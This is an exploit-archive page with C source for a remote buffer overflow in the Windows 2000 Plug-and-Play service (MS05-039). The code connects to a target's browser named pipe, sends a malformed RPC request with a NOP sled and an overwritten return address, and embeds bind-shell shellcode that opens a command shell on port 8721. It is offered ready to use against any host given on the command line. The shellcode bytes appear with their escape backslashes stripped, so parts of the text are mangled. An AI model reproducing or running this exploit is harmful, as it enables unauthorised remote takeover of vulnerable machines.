[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows Plug-and-Play Service Remote Overflow (MS05-039)
# Published : 2005-08-11
# Author : sl0ppy
# Previous Title : Veritas Backup Exec Remote File Access Exploit (windows)
# Next Title : nbSMTP <= 0.99 (util.c) Client-Side Command Execution Exploit
/*
Windows 2000 universal exploit for MS05-039
-x6dx35x6cx30x6ex6ex79-
*/
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winnetwk.h>
#include <winsock.h>
#include <Rpc.h>
#include <wchar.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
BYTE Data1[0x68] =
{0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,
0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,
0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00,
0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,
0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00,
0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
struct DataStruct1
{
BYTE SomeString[0x30];
DWORD RESDataType;
DWORD LFD;
DWORD SDM1;
DWORD SDO;
DWORD SDL;
DWORD SDM2;
BYTE SDA[0x07D0];
DWORD LRD;
DWORD MB;
DWORD DM;
};
struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;
WORD InterfaceVerMaj;
WORD InterfaceVerMin;
GUID TransferSyntax;
DWORD SyntaxVer;
};
//from metasploit, before you were born
BYTE BindShell[374]={"xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"
"x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"
"x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"
"xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"
"x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"
"xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"
"x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x8e"
"x4ex0execxffxd6x89xc7x81xecx00x01x00x00x57x56x53"
"x89xe5xe8x27x00x00x00x90x01x00x00xb6x19x18xe7xa4"
"x19x70xe9xe5x49x86x49xa4x1ax70xc7xa4xadx2exe9xd9"
"x09xf5xadxcbxedxfcx3bx57x53x32x5fx33x32x00x5bx8d"
"x4bx20x51xffxd7x89xdfx89xc3x8dx75x14x6ax07x59x51"
"x53xffx34x8fxffx55x04x59x89x04x8exe2xf2x2bx27x54"
"xffx37xffx55x30x31xc0x50x50x50x50x40x50x40x50xff"
"x55x2cx89xc7x31xdbx53x53x68x02x00x22x11x89xe0x6a"
"x10x50x57xffx55x24x53x57xffx55x28x53x54x57xffx55"
"x20x89xc7x68x43x4dx44x00x89xe3x87xfax31xc0x8dx7c"
"x24xacx6ax15x59xf3xabx87xfax83xecx54xc6x44x24x10"
"x44x66xc7x44x24x3cx01x01x89x7cx24x48x89x7cx24x4c"
"x89x7cx24x50x8dx44x24x10x54x50x51x51x51x41x51x49"
"x51x51x53x51xffx75x00x68x72xfexb3x16xffx55x04xff"
"xd0x89xe6xffx75x00x68xadxd9x05xcexffx55x04x89xc3"
"x6axffxffx36xffxd3xffx75x00x68x7exd8xe2x73xffx55"
"x04x31xdbx53xffxd0"};
BYTE PRPC[0x48] =
{0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;
WORD ContextID;
WORD Opnum;
};
BYTE POP[0x27] =
{0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x00,0x00,0x00,
0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x00,0x00,0x00,
0x05,0x08,0x00,0x00,0x41,0x00,0x41};
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
BYTE rbuf[0x1000];
DWORD dw;
struct RPCBIND RPCBind;
memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
UuidFromString(Interface,&RPCBind.InterfaceUUID);
UuidToString(&RPCBind.InterfaceUUID,&Interface);
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL);
return 0;
}
int Attack(HANDLE PipeHandle)
{
struct RPCFUNC RPCOP;
int bwritten=0;
BYTE *LargeBuffer;
BYTE rbuf[0x100];
DWORD dw;
struct DataStruct1 EvilRPC;
memcpy(&EvilRPC,&Data1,sizeof(EvilRPC));
EvilRPC.SDL=0x07C0;
memset(EvilRPC.SDA,0x90,0x07D0);
EvilRPC.SDA[76]=0x3e;
EvilRPC.SDA[77]=0x1e;
EvilRPC.SDA[78]=0x02;
EvilRPC.SDA[79]=0x75;
memset(EvilRPC.SDA+80,0x90,10);
EvilRPC.SDA[90]=0x90;
memcpy(EvilRPC.SDA+94,BindShell,374);
EvilRPC.MB=0x00000004;
EvilRPC.DM=0x00000000;
EvilRPC.LFD=0x000007E0;
EvilRPC.LRD=0x000007E0;
memcpy(&RPCOP,&POP,sizeof(RPCOP));
RPCOP.Opnum = 54;
RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC);
RPCOP.AllocHint=sizeof(EvilRPC);
LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC));
memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC));
memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP));
memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC));
printf("Sending payload...nThis has to time out... ctrl+c after 5 secsncheck for shell on port 8721");
TransactNamedPipe(PipeHandle, LargeBuffer, sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL);
free(LargeBuffer);
return 0;
}
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
if (argc < 2)
{
printf("Usage: %s <host>n", argv[0]);
return 1;
}
server=argv[1];
_snprintf(unc, sizeof(unc), "\\%s\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
WNetAddConnection2(&nr, "", "", 0);
_snprintf(szPipe, sizeof(szPipe), "\\%s\pipe\browser",server);
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-08003e30051b","1.0");
//SendMalformed RPC request
Attack(hFile);
return 0;
}
// www.Syue.com [2005-08-11]